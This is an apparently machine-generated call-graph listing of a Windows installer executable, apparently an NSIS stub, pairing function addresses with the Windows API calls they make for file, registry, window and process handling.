3908 4019df 3907->3908 3909 4019e6 lstrcmpiW 3908->3909 3910 4019f8 lstrcmpW 3908->3910 3911 4019ec 3909->3911 3910->3911 2964 401e51 2982 402b38 2964->2982 2971 401ec6 CloseHandle 2975 402791 2971->2975 2972 401e77 WaitForSingleObject 2973 401e89 2972->2973 2974 401e9b GetExitCodeProcess 2973->2974 3002 40628b 2973->3002 2976 401eba 2974->2976 2977 401ead 2974->2977 2976->2971 2980 401eb8 2976->2980 3006 405e2f wsprintfW 2977->3006 2980->2971 2983 402b44 2982->2983 3007 405f0a 2983->3007 2986 401e57 2988 405192 2986->2988 2989 4051ad 2988->2989 2998 401e61 2988->2998 2990 4051c9 lstrlenW 2989->2990 2991 405f0a 18 API calls 2989->2991 2992 4051f2 2990->2992 2993 4051d7 lstrlenW 2990->2993 2991->2990 2995 405205 2992->2995 2996 4051f8 SetWindowTextW 2992->2996 2994 4051e9 lstrcatW 2993->2994 2993->2998 2994->2992 2997 40520b SendMessageW SendMessageW SendMessageW 2995->2997 2995->2998 2996->2995 2997->2998 2999 405663 CreateProcessW 2998->2999 3000 405692 CloseHandle 2999->3000 3001 401e67 2999->3001 3000->3001 3001->2971 3001->2972 3001->2975 3003 4062a8 PeekMessageW 3002->3003 3004 401e90 WaitForSingleObject 3003->3004 3005 40629e DispatchMessageW 3003->3005 3004->2973 3005->3003 3006->2980 3012 405f17 3007->3012 3008 406162 3009 402b65 3008->3009 3041 405ee8 lstrcpynW 3008->3041 3009->2986 3025 40617c 3009->3025 3011 405fca GetVersion 3011->3012 3012->3008 3012->3011 3013 406130 lstrlenW 3012->3013 3016 405f0a 10 API calls 3012->3016 3018 406045 GetSystemDirectoryW 3012->3018 3019 406058 GetWindowsDirectoryW 3012->3019 3020 40617c 5 API calls 3012->3020 3021 40608c SHGetSpecialFolderLocation 3012->3021 3022 405f0a 10 API calls 3012->3022 3023 4060d1 lstrcatW 3012->3023 3034 405db5 RegOpenKeyExW 3012->3034 3039 405e2f wsprintfW 3012->3039 3040 405ee8 lstrcpynW 3012->3040 3013->3012 3016->3013 3018->3012 3019->3012 3020->3012 3021->3012 3024 4060a4 SHGetPathFromIDListW CoTaskMemFree 3021->3024 3022->3012 3023->3012 3024->3012 3031 406189 3025->3031 3026 406204 CharPrevW 3029 4061ff 3026->3029 3027 4061f2 CharNextW 3027->3029 3027->3031 3029->3026 3030 406225 3029->3030 3030->2986 3031->3027 3031->3029 3032 4061de CharNextW 3031->3032 3033 4061ed CharNextW 3031->3033 3042 405960 3031->3042 3032->3031 3033->3027 3035 405e29 3034->3035 3036 405de9 RegQueryValueExW 3034->3036 3035->3012 3037 405e0a RegCloseKey 3036->3037 3037->3035 3039->3012 3040->3012 3041->3009 3043 405966 3042->3043 3044 40597c 3043->3044 3045 40596d CharNextW 3043->3045 3044->3031 3045->3043 3046 4052d1 3047 4052f2 GetDlgItem GetDlgItem GetDlgItem 3046->3047 3048 40547d 3046->3048 3091 404162 SendMessageW 3047->3091 3050 405486 GetDlgItem CreateThread FindCloseChangeNotification 3048->3050 3051 4054ae 3048->3051 3050->3051 3114 405265 OleInitialize 3050->3114 3053 4054d9 3051->3053 3054 4054c5 ShowWindow ShowWindow 3051->3054 3055 4054fe 3051->3055 3052 405363 3057 40536a GetClientRect GetSystemMetrics SendMessageW SendMessageW 3052->3057 3056 405539 3053->3056 3059 405513 ShowWindow 3053->3059 3060 4054ed 3053->3060 3096 404162 SendMessageW 3054->3096 3100 404194 3055->3100 3056->3055 3067 405547 SendMessageW 3056->3067 3065 4053d9 3057->3065 3066 4053bd SendMessageW SendMessageW 3057->3066 3063 405533 3059->3063 3064 405525 3059->3064 3097 404106 3060->3097 3062 40550c 3070 404106 SendMessageW 3063->3070 3069 405192 25 API calls 3064->3069 3071 4053ec 3065->3071 3072 4053de SendMessageW 3065->3072 3066->3065 3067->3062 3073 405560 CreatePopupMenu 3067->3073 3069->3063 3070->3056 3092 40412d 3071->3092 3072->3071 3074 405f0a 18 API calls 3073->3074 3076 405570 AppendMenuW 3074->3076 3078 4055a0 TrackPopupMenu 3076->3078 3079 40558d GetWindowRect 3076->3079 3077 4053fc 3080 405405 ShowWindow 3077->3080 3081 405439 GetDlgItem SendMessageW 3077->3081 3078->3062 3083 4055bb 3078->3083 3079->3078 3084 405428 3080->3084 3085 40541b ShowWindow 3080->3085 3081->3062 3082 405460 SendMessageW SendMessageW 3081->3082 3082->3062 3086 4055d7 SendMessageW 3083->3086 3095 404162 SendMessageW 3084->3095 3085->3084 3086->3086 3087 4055f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3086->3087 3089 405619 SendMessageW 3087->3089 3089->3089 3090 405642 GlobalUnlock SetClipboardData CloseClipboard 3089->3090 3090->3062 3091->3052 3093 405f0a 18 API calls 3092->3093 3094 404138 SetDlgItemTextW 3093->3094 3094->3077 3095->3081 3096->3053 3098 404113 SendMessageW 3097->3098 3099 40410d 3097->3099 3098->3055 3099->3098 3101 404235 3100->3101 3102 4041ac GetWindowLongW 3100->3102 3101->3062 3102->3101 3103 4041bd 3102->3103 3104 4041cc GetSysColor 3103->3104 3105 4041cf 3103->3105 3104->3105 3106 4041d5 SetTextColor 3105->3106 3107 4041df SetBkMode 3105->3107 3106->3107 3108 4041f7 GetSysColor 3107->3108 3109 4041fd 3107->3109 3108->3109 3110 404204 SetBkColor 3109->3110 3111 40420e 3109->3111 3110->3111 3111->3101 3112 404221 DeleteObject 3111->3112 3113 404228 CreateBrushIndirect 3111->3113 3112->3113 3113->3101 3121 404179 3114->3121 3116 404179 SendMessageW 3117 4052c1 OleUninitialize 3116->3117 3118 405288 3120 4052af 3118->3120 3124 401389 3118->3124 3120->3116 3122 404191 3121->3122 3123 404182 SendMessageW 3121->3123 3122->3118 3123->3122 3125 401390 3124->3125 3126 4013fe 3125->3126 3127 4013cb MulDiv SendMessageW 3125->3127 3126->3118 3127->3125 3912 402251 3913 40225f 3912->3913 3914 402259 3912->3914 3916 40226d 3913->3916 3917 402b38 18 API calls 3913->3917 3915 402b38 18 API calls 3914->3915 3915->3913 3918 402b38 18 API calls 3916->3918 3920 40227b 3916->3920 3917->3916 3918->3920 3919 402b38 18 API calls 3921 402284 WritePrivateProfileStringW 3919->3921 3920->3919 3128 401752 3129 402b38 18 API calls 3128->3129 3130 401759 3129->3130 3131 401781 3130->3131 3132 401779 3130->3132 3186 405ee8 lstrcpynW 3131->3186 3185 405ee8 lstrcpynW 3132->3185 3135 40177f 3139 40617c 5 API calls 3135->3139 3136 40178c 3187 405933 lstrlenW CharPrevW 3136->3187 3164 40179e 3139->3164 3143 4017b0 CompareFileTime 3143->3164 3144 401870 3146 405192 25 API calls 3144->3146 3145 401847 3147 405192 25 API calls 3145->3147 3156 40185c 3145->3156 3149 40187a 3146->3149 3147->3156 3148 405ee8 lstrcpynW 3148->3164 3170 403060 3149->3170 3152 4018a1 SetFileTime 3153 4018b3 FindCloseChangeNotification 3152->3153 3155 4018c4 3153->3155 3153->3156 3154 405f0a 18 API calls 3154->3164 3157 4018c9 3155->3157 3158 4018dc 3155->3158 3159 405f0a 18 API calls 3157->3159 3160 405f0a 18 API calls 3158->3160 3162 4018d1 lstrcatW 3159->3162 3163 4018e4 3160->3163 3162->3163 3165 4056c4 MessageBoxIndirectW 3163->3165 3164->3143 3164->3144 3164->3145 3164->3148 3164->3154 3166 405b2f GetFileAttributesW 3164->3166 3169 405b54 GetFileAttributesW CreateFileW 3164->3169 3190 40622b FindFirstFileW 3164->3190 3193 4056c4 3164->3193 3165->3156 3167 405b41 SetFileAttributesW 3166->3167 3168 405b4e 3166->3168 3167->3168 3168->3164 3169->3164 3171 403070 SetFilePointer 3170->3171 3172 40308c 3170->3172 3171->3172 3197 40317b GetTickCount 3172->3197 3177 40317b 43 API calls 3178 4030c3 3177->3178 3179 40313d ReadFile 3178->3179 3181 40188d 3178->3181 3184 4030d3 3178->3184 3179->3181 3181->3152 3181->3153 3182 405bd7 ReadFile 3182->3184 3183 403106 WriteFile 3183->3181 3183->3184 3184->3181 3184->3182 3184->3183 3185->3135 3186->3136 3188 401792 lstrcatW 3187->3188 3189 40594f lstrcatW 3187->3189 3188->3135 3189->3188 3191 406241 FindClose 3190->3191 3192 40624c 3190->3192 3191->3192 3192->3164 3194 4056d9 3193->3194 3195 405725 3194->3195 3196 4056ed MessageBoxIndirectW 3194->3196 3195->3164 3196->3195 3198 4032e5 3197->3198 3199 4031aa 3197->3199 3200 402d18 33 API calls 3198->3200 3212 40330d SetFilePointer 3199->3212 3206 403093 3200->3206 3202 4031b5 SetFilePointer 3207 4031da 3202->3207 3206->3181 3210 405bd7 ReadFile 3206->3210 3207->3206 3208 40326f WriteFile 3207->3208 3209 4032c6 SetFilePointer 3207->3209 3213 4032f7 3207->3213 3216 40638e 3207->3216 3223 402d18 3207->3223 3208->3206 3208->3207 3209->3198 3211 4030ac 3210->3211 3211->3177 3211->3181 3212->3202 3214 405bd7 ReadFile 3213->3214 3215 40330a 3214->3215 3215->3207 3217 4063b3 3216->3217 3218 4063bb 3216->3218 3217->3207 3218->3217 3219 406442 GlobalFree 3218->3219 3220 40644b GlobalAlloc 3218->3220 3221 4064c2 GlobalAlloc 3218->3221 3222 4064b9 GlobalFree 3218->3222 3219->3220 3220->3217 3220->3218 3221->3217 3221->3218 3222->3221 3224 402d41 3223->3224 3225 402d29 3223->3225 3228 402d51 GetTickCount 3224->3228 3229 402d49 3224->3229 3226 402d32 DestroyWindow 3225->3226 3227 402d39 3225->3227 3226->3227 3227->3207 3228->3227 3231 402d5f 3228->3231 3230 40628b 2 API calls 3229->3230 3230->3227 3232 402d94 CreateDialogParamW ShowWindow 3231->3232 3233 402d67 3231->3233 3232->3227 3233->3227 3238 402cfc 3233->3238 3235 402d75 wsprintfW 3236 405192 25 API calls 3235->3236 3237 402d92 3236->3237 3237->3227 3239 402d0b 3238->3239 3240 402d0d MulDiv 3238->3240 3239->3240 3240->3235 3922 402452 3923 402c42 19 API calls 3922->3923 3924 40245c 3923->3924 3925 402b1b 18 API calls 3924->3925 3926 402465 3925->3926 3927 402489 RegEnumValueW 3926->3927 3928 40247d RegEnumKeyW 3926->3928 3930 402791 3926->3930 3929 4024a2 RegCloseKey 3927->3929 3927->3930 3928->3929 3929->3930 3241 4022d3 3242 402303 3241->3242 3243 4022d8 3241->3243 3245 402b38 18 API calls 3242->3245 3264 402c42 3243->3264 3247 40230a 3245->3247 3246 4022df 3248 4022e9 3246->3248 3252 402320 3246->3252 3253 402b78 RegOpenKeyExW 3247->3253 3249 402b38 18 API calls 3248->3249 3251 4022f0 RegDeleteValueW RegCloseKey 3249->3251 3251->3252 3254 402c0c 3253->3254 3256 402ba3 3253->3256 3254->3252 3255 402bc9 RegEnumKeyW 3255->3256 3257 402bdb RegCloseKey 3255->3257 3256->3255 3256->3257 3259 402c00 RegCloseKey 3256->3259 3262 402b78 3 API calls 3256->3262 3268 406252 GetModuleHandleA 3257->3268 3261 402bef 3259->3261 3261->3254 3262->3256 3263 402c1b RegDeleteKeyW 3263->3261 3265 402b38 18 API calls 3264->3265 3266 402c5b 3265->3266 3267 402c69 RegOpenKeyExW 3266->3267 3267->3246 3269 406279 GetProcAddress 3268->3269 3270 40626e LoadLibraryA 3268->3270 3271 402beb 3269->3271 3270->3269 3270->3271 3271->3261 3271->3263 3932 401ed4 3933 402b38 18 API calls 3932->3933 3934 401edb 3933->3934 3935 40622b 2 API calls 3934->3935 3936 401ee1 3935->3936 3938 401ef2 3936->3938 3939 405e2f wsprintfW 3936->3939 3939->3938 3389 403c55 3390 403da8 3389->3390 3391 403c6d 3389->3391 3393 403df9 3390->3393 3394 403db9 GetDlgItem GetDlgItem 3390->3394 3391->3390 3392 403c79 3391->3392 3395 403c84 SetWindowPos 3392->3395 3396 403c97 3392->3396 3398 403e53 3393->3398 3407 401389 2 API calls 3393->3407 3397 40412d 19 API calls 3394->3397 3395->3396 3400 403cb4 3396->3400 3401 403c9c ShowWindow 3396->3401 3402 403de3 SetClassLongW 3397->3402 3399 404179 SendMessageW 3398->3399 3403 403da3 3398->3403 3430 403e65 3399->3430 3404 403cd6 3400->3404 3405 403cbc DestroyWindow 3400->3405 3401->3400 3406 40140b 2 API calls 3402->3406 3409 403cdb SetWindowLongW 3404->3409 3410 403cec 3404->3410 3408 4040b6 3405->3408 3406->3393 3411 403e2b 3407->3411 3408->3403 3418 4040e7 ShowWindow 3408->3418 3409->3403 3415 403d95 3410->3415 3416 403cf8 GetDlgItem 3410->3416 3411->3398 3412 403e2f SendMessageW 3411->3412 3412->3403 3413 40140b 2 API calls 3413->3430 3414 4040b8 DestroyWindow EndDialog 3414->3408 3417 404194 8 API calls 3415->3417 3419 403d28 3416->3419 3420 403d0b SendMessageW IsWindowEnabled 3416->3420 3417->3403 3418->3403 3422 403d35 3419->3422 3423 403d7c SendMessageW 3419->3423 3424 403d48 3419->3424 3433 403d2d 3419->3433 3420->3403 3420->3419 3421 405f0a 18 API calls 3421->3430 3422->3423 3422->3433 3423->3415 3427 403d50 3424->3427 3428 403d65 3424->3428 3425 404106 SendMessageW 3429 403d63 3425->3429 3426 40412d 19 API calls 3426->3430 3462 40140b 3427->3462 3432 40140b 2 API calls 3428->3432 3429->3415 3430->3403 3430->3413 3430->3414 3430->3421 3430->3426 3435 40412d 19 API calls 3430->3435 3450 403ff8 DestroyWindow 3430->3450 3434 403d6c 3432->3434 3433->3425 3434->3415 3434->3433 3436 403ee0 GetDlgItem 3435->3436 3437 403ef5 3436->3437 3438 403efd ShowWindow KiUserCallbackDispatcher 3436->3438 3437->3438 3459 40414f KiUserCallbackDispatcher 3438->3459 3440 403f27 EnableWindow 3443 403f3b 3440->3443 3441 403f40 GetSystemMenu EnableMenuItem SendMessageW 3442 403f70 SendMessageW 3441->3442 3441->3443 3442->3443 3443->3441 3460 404162 SendMessageW 3443->3460 3461 405ee8 lstrcpynW 3443->3461 3446 403f9e lstrlenW 3447 405f0a 18 API calls 3446->3447 3448 403fb4 SetWindowTextW 3447->3448 3449 401389 2 API calls 3448->3449 3449->3430 3450->3408 3451 404012 CreateDialogParamW 3450->3451 3451->3408 3452 404045 3451->3452 3453 40412d 19 API calls 3452->3453 3454 404050 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3453->3454 3455 401389 2 API calls 3454->3455 3456 404096 3455->3456 3456->3403 3457 40409e ShowWindow 3456->3457 3458 404179 SendMessageW 3457->3458 3458->3408 3459->3440 3460->3443 3461->3446 3463 401389 2 API calls 3462->3463 3464 401420 3463->3464 3464->3433 3940 4014d7 3941 402b1b 18 API calls 3940->3941 3942 4014dd Sleep 3941->3942 3944 4029c5 3942->3944 3465 403358 #17 SetErrorMode OleInitialize 3466 406252 3 API calls 3465->3466 3467 40339b SHGetFileInfoW 3466->3467 3538 405ee8 lstrcpynW 3467->3538 3469 4033c6 GetCommandLineW 3539 405ee8 lstrcpynW 3469->3539 3471 4033d8 GetModuleHandleW 3472 4033f0 3471->3472 3473 405960 CharNextW 3472->3473 3474 4033ff CharNextW 3473->3474 3476 40340f 3474->3476 3475 4034e4 3477 4034f8 GetTempPathW 3475->3477 3476->3475 3476->3476 3480 405960 CharNextW 3476->3480 3488 4034e6 3476->3488 3540 403324 3477->3540 3479 403510 3481 403514 GetWindowsDirectoryW lstrcatW 3479->3481 3482 40356a DeleteFileW 3479->3482 3480->3476 3483 403324 11 API calls 3481->3483 3548 402dba GetTickCount GetModuleFileNameW 3482->3548 3485 403530 3483->3485 3485->3482 3487 403534 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3485->3487 3486 40357e 3489 403616 3486->3489 3491 403606 3486->3491 3495 405960 CharNextW 3486->3495 3490 403324 11 API calls 3487->3490 3632 405ee8 lstrcpynW 3488->3632 3635 4037c0 3489->3635 3494 403562 3490->3494 3578 4038b2 3491->3578 3494->3482 3494->3489 3498 403599 3495->3498 3504 4035e0 3498->3504 3505 403645 lstrcatW lstrcmpiW 3498->3505 3499 403725 3502 4037a8 ExitProcess 3499->3502 3506 406252 3 API calls 3499->3506 3500 40362f 3501 4056c4 MessageBoxIndirectW 3500->3501 3503 40363d ExitProcess 3501->3503 3508 405a3b 18 API calls 3504->3508 3505->3489 3509 403661 CreateDirectoryW SetCurrentDirectoryW 3505->3509 3510 403734 3506->3510 3511 4035ec 3508->3511 3512 403684 3509->3512 3513 403679 3509->3513 3514 406252 3 API calls 3510->3514 3511->3489 3633 405ee8 lstrcpynW 3511->3633 3645 405ee8 lstrcpynW 3512->3645 3644 405ee8 lstrcpynW 3513->3644 3517 40373d 3514->3517 3519 406252 3 API calls 3517->3519 3520 403746 3519->3520 3522 403794 ExitWindowsEx 3520->3522 3527 403754 GetCurrentProcess 3520->3527 3521 4035fb 3634 405ee8 lstrcpynW 3521->3634 3522->3502 3525 4037a1 3522->3525 3524 405f0a 18 API calls 3526 4036c3 DeleteFileW 3524->3526 3528 40140b 2 API calls 3525->3528 3529 4036d0 CopyFileW 3526->3529 3535 403692 3526->3535 3531 403764 3527->3531 3528->3502 3529->3535 3530 403719 3532 405d82 40 API calls 3530->3532 3531->3522 3532->3489 3533 405d82 40 API calls 3533->3535 3534 405f0a 18 API calls 3534->3535 3535->3524 3535->3530 3535->3533 3535->3534 3536 405663 2 API calls 3535->3536 3537 403704 CloseHandle 3535->3537 3536->3535 3537->3535 3538->3469 3539->3471 3541 40617c 5 API calls 3540->3541 3542 403330 3541->3542 3543 40333a 3542->3543 3544 405933 3 API calls 3542->3544 3543->3479 3545 403342 CreateDirectoryW 3544->3545 3646 405b83 3545->3646 3650 405b54 GetFileAttributesW CreateFileW 3548->3650 3550 402dfd 3577 402e0a 3550->3577 3651 405ee8 lstrcpynW 3550->3651 3552 402e20 3553 40597f 2 API calls 3552->3553 3554 402e26 3553->3554 3652 405ee8 lstrcpynW 3554->3652 3556 402e31 GetFileSize 3557 402f32 3556->3557 3559 402e48 3556->3559 3558 402d18 33 API calls 3557->3558 3560 402f39 3558->3560 3559->3557 3561 4032f7 ReadFile 3559->3561 3563 402fcd 3559->3563 3570 402d18 33 API calls 3559->3570 3559->3577 3562 402f75 GlobalAlloc 3560->3562 3560->3577 3654 40330d SetFilePointer 3560->3654 3561->3559 3566 402f8c 3562->3566 3564 402d18 33 API calls 3563->3564 3564->3577 3568 405b83 2 API calls 3566->3568 3567 402f56 3569 4032f7 ReadFile 3567->3569 3571 402f9d CreateFileW 3568->3571 3572 402f61 3569->3572 3570->3559 3573 402fd7 3571->3573 3571->3577 3572->3562 3572->3577 3653 40330d SetFilePointer 3573->3653 3575 402fe5 3576 403060 46 API calls 3575->3576 3576->3577 3577->3486 3577->3577 3579 406252 3 API calls 3578->3579 3580 4038c6 3579->3580 3581 4038cc 3580->3581 3582 4038de 3580->3582 3664 405e2f wsprintfW 3581->3664 3583 405db5 3 API calls 3582->3583 3584 40390e 3583->3584 3585 40392d lstrcatW 3584->3585 3587 405db5 3 API calls 3584->3587 3588 4038dc 3585->3588 3587->3585 3655 403b88 3588->3655 3591 405a3b 18 API calls 3592 40395f 3591->3592 3593 4039f3 3592->3593 3595 405db5 3 API calls 3592->3595 3594 405a3b 18 API calls 3593->3594 3596 4039f9 3594->3596 3597 403991 3595->3597 3598 403a09 LoadImageW 3596->3598 3601 405f0a 18 API calls 3596->3601 3597->3593 3605 4039b2 lstrlenW 3597->3605 3609 405960 CharNextW 3597->3609 3599 403a30 RegisterClassW 3598->3599 3600 403aaf 3598->3600 3602 403a66 SystemParametersInfoW CreateWindowExW 3599->3602 3603 403ab9 3599->3603 3604 40140b 2 API calls 3600->3604 3601->3598 3602->3600 3603->3489 3608 403ab5 3604->3608 3606 4039c0 lstrcmpiW 3605->3606 3607 4039e6 3605->3607 3606->3607 3610 4039d0 GetFileAttributesW 3606->3610 3611 405933 3 API calls 3607->3611 3608->3603 3614 403b88 19 API calls 3608->3614 3612 4039af 3609->3612 3613 4039dc 3610->3613 3615 4039ec 3611->3615 3612->3605 3613->3607 3616 40597f 2 API calls 3613->3616 3617 403ac6 3614->3617 3665 405ee8 lstrcpynW 3615->3665 3616->3607 3619 403ad2 ShowWindow LoadLibraryW 3617->3619 3620 403b55 3617->3620 3622 403af1 LoadLibraryW 3619->3622 3623 403af8 GetClassInfoW 3619->3623 3621 405265 5 API calls 3620->3621 3624 403b5b 3621->3624 3622->3623 3625 403b22 DialogBoxParamW 3623->3625 3626 403b0c GetClassInfoW RegisterClassW 3623->3626 3627 403b77 3624->3627 3628 403b5f 3624->3628 3629 40140b 2 API calls 3625->3629 3626->3625 3630 40140b 2 API calls 3627->3630 3628->3603 3631 40140b 2 API calls 3628->3631 3629->3603 3630->3603 3631->3603 3632->3477 3633->3521 3634->3491 3636 4037d1 CloseHandle 3635->3636 3637 4037db 3635->3637 3636->3637 3638 4037e5 CloseHandle 3637->3638 3639 4037ef 3637->3639 3638->3639 3667 40381d 3639->3667 3642 405770 71 API calls 3643 40361f OleUninitialize 3642->3643 3643->3499 3643->3500 3644->3512 3645->3535 3647 405b90 GetTickCount GetTempFileNameW 3646->3647 3648 405bc6 3647->3648 3649 403356 3647->3649 3648->3647 3648->3649 3649->3479 3650->3550 3651->3552 3652->3556 3653->3575 3654->3567 3656 403b9c 3655->3656 3666 405e2f wsprintfW 3656->3666 3658 403c0d 3659 405f0a 18 API calls 3658->3659 3660 403c19 SetWindowTextW 3659->3660 3661 40393d 3660->3661 3662 403c35 3660->3662 3661->3591 3662->3661 3663 405f0a 18 API calls 3662->3663 3663->3662 3664->3588 3665->3593 3666->3658 3668 40382b 3667->3668 3669 403830 FreeLibrary GlobalFree 3668->3669 3670 4037f4 3668->3670 3669->3669 3669->3670 3670->3642 3945 40155b 3946 40296b 3945->3946 3949 405e2f wsprintfW 3946->3949 3948 402970 3949->3948 3957 4023de 3958 402c42 19 API calls 3957->3958 3959 4023e8 3958->3959 3960 402b38 18 API calls 3959->3960 3961 4023f1 3960->3961 3962 4023fc RegQueryValueExW 3961->3962 3965 402791 3961->3965 3963 402422 RegCloseKey 3962->3963 3964 40241c 3962->3964 3963->3965 3964->3963 3968 405e2f wsprintfW 3964->3968 3968->3963 3969 401ce5 GetDlgItem GetClientRect 3970 402b38 18 API calls 3969->3970 3971 401d17 LoadImageW SendMessageW 3970->3971 3972 4029c5 3971->3972 3973 401d35 DeleteObject 3971->3973 3973->3972 3974 401de8 EnableWindow 3975 4029c5 3974->3975 3976 40206a 3977 402b38 18 API calls 3976->3977 3978 402071 3977->3978 3979 402b38 18 API calls 3978->3979 3980 40207b 3979->3980 3981 402b38 18 API calls 3980->3981 3982 402084 3981->3982 3983 402b38 18 API calls 3982->3983 3984 40208e 3983->3984 3985 402b38 18 API calls 3984->3985 3986 402098 3985->3986 3987 4020ac CoCreateInstance 3986->3987 3988 402b38 18 API calls 3986->3988 3991 4020cb 3987->3991 3988->3987 3989 401423 25 API calls 3990 402195 3989->3990 3991->3989 3991->3990 3992 40156b 3993 401584 3992->3993 3994 40157b ShowWindow 3992->3994 3995 401592 ShowWindow 3993->3995 3996 4029c5 3993->3996 3994->3993 3995->3996 3997 4024ec 3998 4024f1 3997->3998 3999 40250a 3997->3999 4000 402b1b 18 API calls 3998->4000 4001 402510 3999->4001 4002 40253c 3999->4002 4007 4024f8 4000->4007 4003 402b38 18 API calls 4001->4003 4004 402b38 18 API calls 4002->4004 4005 402517 WideCharToMultiByte lstrlenA 4003->4005 4006 402543 lstrlenW 4004->4006 4005->4007 4006->4007 4008 402565 WriteFile 4007->4008 4009 402791 4007->4009 4008->4009 4010 40276e 4011 402b38 18 API calls 4010->4011 4012 402775 FindFirstFileW 4011->4012 4013 40279d 4012->4013 4017 402788 4012->4017 4015 4027a6 4013->4015 4018 405e2f wsprintfW 4013->4018 4019 405ee8 lstrcpynW 4015->4019 4018->4015 4019->4017 4020 4018ef 4021 401926 4020->4021 4022 402b38 18 API calls 4021->4022 4023 40192b 4022->4023 4024 405770 71 API calls 4023->4024 4025 401934 4024->4025 4026 403870 4027 40387b 4026->4027 4028 403882 GlobalAlloc 4027->4028 4029 40387f 4027->4029 4028->4029 4030 402571 4031 402b1b 18 API calls 4030->4031 4035 402580 4031->4035 4032 40269e 4033 4025c6 ReadFile 4033->4032 4033->4035 4034 405bd7 ReadFile 4034->4035 4035->4032 4035->4033 4035->4034 4036 4026a0 4035->4036 4037 402606 MultiByteToWideChar 4035->4037 4039 40262c SetFilePointer MultiByteToWideChar 4035->4039 4040 4026b1 4035->4040 4042 405e2f wsprintfW 4036->4042 4037->4035 4039->4035 4040->4032 4041 4026d2 SetFilePointer 4040->4041 4041->4032 4042->4032 4043 4014f1 SetForegroundWindow 4044 4029c5 4043->4044 4052 4018f2 4053 402b38 18 API calls 4052->4053 4054 4018f9 4053->4054 4055 4056c4 MessageBoxIndirectW 4054->4055 4056 401902 4055->4056 4064 401df3 4065 402b38 18 API calls 4064->4065 4066 401df9 4065->4066 4067 402b38 18 API calls 4066->4067 4068 401e02 4067->4068 4069 402b38 18 API calls 4068->4069 4070 401e0b 4069->4070 4071 402b38 18 API calls 4070->4071 4072 401e14 4071->4072 4073 401423 25 API calls 4072->4073 4074 401e1b ShellExecuteW 4073->4074 4075 401e4c 4074->4075 4081 4026f7 4082 4026fe 4081->4082 4085 402970 4081->4085 4083 402b1b 18 API calls 4082->4083 4084 402709 4083->4084 4086 402710 SetFilePointer 4084->4086 4086->4085 4087 402720 4086->4087 4089 405e2f wsprintfW 4087->4089 4089->4085 4097 40427b lstrlenW 4098 40429a 4097->4098 4099 40429c WideCharToMultiByte 4097->4099 4098->4099 4100 402c7d 4101 402ca8 4100->4101 4102 402c8f SetTimer 4100->4102 4103 402cf6 4101->4103 4104 402cfc MulDiv 4101->4104 4102->4101 4105 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 4104->4105 4105->4103 4107 4014ff 4108 401507 4107->4108 4110 40151a 4107->4110 4109 402b1b 18 API calls 4108->4109 4109->4110 4111 401000 4112 401037 BeginPaint GetClientRect 4111->4112 4113 40100c DefWindowProcW 4111->4113 4115 4010f3 4112->4115 4116 401179 4113->4116 4117 401073 CreateBrushIndirect FillRect DeleteObject 4115->4117 4118 4010fc 4115->4118 4117->4115 4119 401102 CreateFontIndirectW 4118->4119 4120 401167 EndPaint 4118->4120 4119->4120 4121 401112 6 API calls 4119->4121 4120->4116 4121->4120 4122 401a00 4123 402b38 18 API calls 4122->4123 4124 401a09 ExpandEnvironmentStringsW 4123->4124 4125 401a1d 4124->4125 4127 401a30 4124->4127 4126 401a22 lstrcmpW 4125->4126 4125->4127 4126->4127 4128 401b01 4129 402b38 18 API calls 4128->4129 4130 401b08 4129->4130 4131 402b1b 18 API calls 4130->4131 4132 401b11 wsprintfW 4131->4132 4133 4029c5 4132->4133 4134 404581 4135 404591 4134->4135 4136 4045b7 4134->4136 4137 40412d 19 API calls 4135->4137 4138 404194 8 API calls 4136->4138 4140 40459e SetDlgItemTextW 4137->4140 4139 4045c3 4138->4139 4140->4136 4141 405106 4142 405116 4141->4142 4143 40512a 4141->4143 4144 405173 4142->4144 4145 40511c 4142->4145 4146 405132 IsWindowVisible 4143->4146 4152 405149 4143->4152 4147 405178 CallWindowProcW 4144->4147 4148 404179 SendMessageW 4145->4148 4146->4144 4149 40513f 4146->4149 4150 405126 4147->4150 4148->4150 4154 404a5c SendMessageW 4149->4154 4152->4147 4159 404adc 4152->4159 4155 404abb SendMessageW 4154->4155 4156 404a7f GetMessagePos ScreenToClient SendMessageW 4154->4156 4157 404ab3 4155->4157 4156->4157 4158 404ab8 4156->4158 4157->4152 4158->4155 4168 405ee8 lstrcpynW 4159->4168 4161 404aef 4169 405e2f wsprintfW 4161->4169 4163 404af9 4164 40140b 2 API calls 4163->4164 4165 404b02 4164->4165 4170 405ee8 lstrcpynW 4165->4170 4167 404b09 4167->4144 4168->4161 4169->4163 4170->4167 4171 401f08 4172 402b38 18 API calls 4171->4172 4173 401f0f GetFileVersionInfoSizeW 4172->4173 4174 401f8c 4173->4174 4175 401f36 GlobalAlloc 4173->4175 4175->4174 4176 401f4a GetFileVersionInfoW 4175->4176 4176->4174 4177 401f59 VerQueryValueW 4176->4177 4177->4174 4178 401f72 4177->4178 4182 405e2f wsprintfW 4178->4182 4180 401f7e 4183 405e2f wsprintfW 4180->4183 4182->4180 4183->4174 4191 404b0e GetDlgItem GetDlgItem 4192 404b60 7 API calls 4191->4192 4199 404d79 4191->4199 4193 404c03 DeleteObject 4192->4193 4194 404bf6 SendMessageW 4192->4194 4195 404c0c 4193->4195 4194->4193 4196 404c43 4195->4196 4198 405f0a 18 API calls 4195->4198 4200 40412d 19 API calls 4196->4200 4197 404e5d 4201 404f09 4197->4201 4210 404eb6 SendMessageW 4197->4210 4234 404d6c 4197->4234 4202 404c25 SendMessageW SendMessageW 4198->4202 4199->4197 4208 404a5c 5 API calls 4199->4208 4220 404dea 4199->4220 4205 404c57 4200->4205 4203 404f13 SendMessageW 4201->4203 4204 404f1b 4201->4204 4202->4195 4203->4204 4212 404f34 4204->4212 4213 404f2d ImageList_Destroy 4204->4213 4221 404f44 4204->4221 4209 40412d 19 API calls 4205->4209 4206 404194 8 API calls 4211 4050ff 4206->4211 4207 404e4f SendMessageW 4207->4197 4208->4220 4225 404c65 4209->4225 4215 404ecb SendMessageW 4210->4215 4210->4234 4216 404f3d GlobalFree 4212->4216 4212->4221 4213->4212 4214 4050b3 4222 4050c5 ShowWindow GetDlgItem ShowWindow 4214->4222 4214->4234 4218 404ede 4215->4218 4216->4221 4217 404d3a GetWindowLongW SetWindowLongW 4219 404d53 4217->4219 4226 404eef SendMessageW 4218->4226 4223 404d71 4219->4223 4224 404d59 ShowWindow 